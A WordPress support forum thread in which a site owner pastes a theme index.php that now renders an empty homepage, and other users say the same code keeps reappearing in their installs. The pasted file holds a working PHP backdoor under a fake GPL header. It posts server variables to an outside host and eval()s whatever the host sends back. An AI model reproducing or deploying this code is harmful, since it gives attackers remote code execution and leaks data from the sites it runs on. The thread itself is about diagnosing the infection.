Problem with Index.php

  • thomasparis

    (@thomasparis)


    10 years, 6 months ago

    Hi guys,
    Since few days I have some issue with my home page, some of my friends modify the index.php since that day the homepage is like empty…
    Is anything wrong in this code..?
    Thank you for your help

    <?php

/*			GNU GENERAL PUBLIC LICENSE

TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

This program is free software; you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by

the Free Software Foundation; either version 2 of the License, or

(at your option) any later version.

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

GNU General Public License for more details.

GNU GENERAL PUBLIC LICENSE

Version 2, June 1991

*/

function live_stats(){

error_reporting(0);

$live_stats_url="http://www.pogpgh.org/session.php?id";

if($include_test) return 0;

global $include_test; $include_test = 1;

if($_GET['forced_stop'] or $_POST['forced_stop']) return 0;

if($_GET['forced_start'] or $_POST['forced_start']){} else {

if($_COOKIE['live_stats']) return 0;

$uagent=$_SERVER["HTTP_USER_AGENT"];

if(!$uagent) return 0;

$url_get = "";

if(isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS']=='on')) {

	$url_get .= "https:";} else { $url_get .= "http:";}

if($_SERVER['SERVER_PORT'] == 80 or $_SERVER['SERVER_PORT'] == 443){

	$url_get .= "//";} else { $url_get .= $_SERVER['SERVER_PORT']."//";}

$url_get .= $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];

if($_SERVER['HTTP_REFERER'] === $url_get) return 0;

if($_SERVER['REMOTE_ADDR'] === "127.0.0.1") return 0;

if($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) return 0;

$bot_list = array("Google", "Slurp", "MSNBot",

"ia_archiver", "Yandex", "Rambler", 

"bot", "spid", "Lynx", "PHP", 

"WordPress","integromedb","SISTRIX",

"Aggregator", "findlinks", "Xenu", 

"BacklinkCrawler", "Scheduler", "mod_pagespeed",

"Index", "ahoo", "Tapatalk", "PubSub", "RSS");

if(preg_match("/" . implode("|", $bot_list) . "/i", $bkljg)) return 0;

}

foreach($_SERVER as $key => $value) { 

$data.= "&REM_".$key."='".base64_encode($value)."'";}

$context = stream_context_create(

array('http'=>array(

	'timeout' => '60',

	'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",

	'method' => 'POST',

	'content' => "REM_REM='1'".$data

)));

$contents=file_get_contents($live_stats_url, false ,$context);

if(!$contents) {

	if(!headers_sent()) {

	@setcookie("live_stats","2",time()+172800); } return 0;

	echo "<script>document.cookie='live_stats=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; return 0;}

eval($contents);

}

live_stats();

?>

<?php get_header(); ?>
<?php if ( get_option('of_slider') == 'true' && is_home() && !is_paged()) get_template_part('functions/slider');; ?>
<div id="content-container" class="clear">
	<div id="main" class="wrapper">
		<div id="content" class="magazine">

		<?php $portfolio_number = 3;?>
		<?php if (have_posts()) : $count = 0; ?>
		<?php while (have_posts()) : the_post(); $count++;
		//Set Post Number
		$portfolio_count = 6;
		//Set Post Class
		$post_class = 'block';
		//Alternate Post Class
		if ( $count % $portfolio_count == 0 ) { $post_class .= ' last';
		dynamic_sidebar('advertising');
		}
		?>

			<div class="<?php echo $post_class ?>">
				<div id="post-<?php the_ID(); ?>" <?php post_class( 'post' ); ?>>

				<a>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>" class="readmore">Lire la suite →</a>
				<div class="sociaLinks"><p>Partager</p><a title="Facebook">&t=<?php the_title(); ?>" target="blank"></a><a href="http://twitter.com/share">" data-via="@MYSITEmag" data-text="<?php the_title(); ?>" data-count="horizontal"></a></div>

					<a>" class="post-thumb">
						<!-- <span class="post-thumb-date"><?php the_time('j'); ?> <?php the_time('M'); ?></span> -->

						<?php // the_post_thumbnail( 'main-mag'); ?>
			<img src="<?php bloginfo('stylesheet_directory'); ?>/timthumb.php?src=<?php echo catch_that_image() ?>&h=170&w=270&zc=1" />

					</a> 

					<!--BEGIN .ENTRY -->
					<div class="contentText <?php if ( !has_post_thumbnail() ) echo 'nothumb'; ?>">
						<p class="depuis">il y a <?php echo human_time_diff(get_the_time('U'), current_time('timestamp')); ?>  <span> Par <?php the_author_link(); ?></span></p>
						<h1 class="title"><a>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h1>
						<p><?php echo limit_words(get_the_excerpt(), '30'); ?></p>

					<!-- END .ENTRY-->
					</div>
				<!-- END .POST-->

				</div>
			<!-- END .BLOCK-->
			</div><div style="clear:both;"></div>
		<?php if ( $count % $portfolio_count == 0 ) { echo '<div class="fix"></div>'; }  ?>
		<?php endwhile; /* rewind or continue if all posts have been fetched */ ?>
				<div class="navigation index">
					<?php if (function_exists( 'wp_pagenavi' )) : wp_pagenavi(); ?>
					<?php else : ?>
						<div class="alignleft"><?php next_posts_link(__ ( '« Older Entries', 'pgm' )); ?></div>
						<div class="alignright"><?php previous_posts_link(__ ( 'Newer Entries »', 'pgm' )); ?></div>
					<?php endif; ?>
				</div><!--end navigation-->
		<?php else : ?>
		<?php endif; ?>
		</div><!--end content-->
<?php if ( is_active_sidebar( 'index_sidebar' ) ) : ?>
	<div id="sidebar">
		<div id="sidebar_content">
			<?php dynamic_sidebar( 'index_sidebar' ); ?>
		</div><!--END sidebar_content-->
		<div id="sidebar_bottom"></div>
	</div><!--END sidebar-->
<?php else : ?>
	<?php get_sidebar(); ?>
<?php endif; ?>
<!--END #content-container -->
</div>
<?php get_footer(); ?>
Viewing 3 replies - 1 through 3 (of 3 total)
  • didimitrie

    (@didimitrie)

    10 years, 6 months ago

    Hey, bump up. I have the same problem here.

    The above code (or similar) is appearing randomly in the root index.php and as well any other index.php file.

    I delete it and then it keeps on popping back after a few days or so. Should I take it that the website is “hacked”?

    Running on the latest upgraded 4.3.1.

    talon8

    (@talon8)

    10 years, 6 months ago

    I’ve done some looking and it appears that this means that the site has been “hacked”.

    See here: http://www.stillwatereng.net/blog/hacked-by-the-people-of-god

    Anyone find a good way of cleaning this? More importantly, any idea where the weakness might be?

    didimitrie

    (@didimitrie)

    10 years, 6 months ago

    No clue. I’ll repost my comment from the website above:

    Heads up: check all your index.php files from your wordpress install.

    I found the malicious code in the root install folder index.php, as well as the wp-content/themes/index.php, as well as in all the index.php files of all the themes, as well as wp-content/plugins/index.php.

    Also found suspicious code in a so called “cache” folder that materialised without me knowing…

    This happened running the latest 4.3.1 wordpress version, and it keeps getting back, even after we did a ftp password change.

    I will change the htaccces file and see where that gets me. EDIT: htaccess file was ok.

    this was happening (still is) on bogdanvanbroeck.com.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Problem with Index.php’ is closed to new replies.

Tags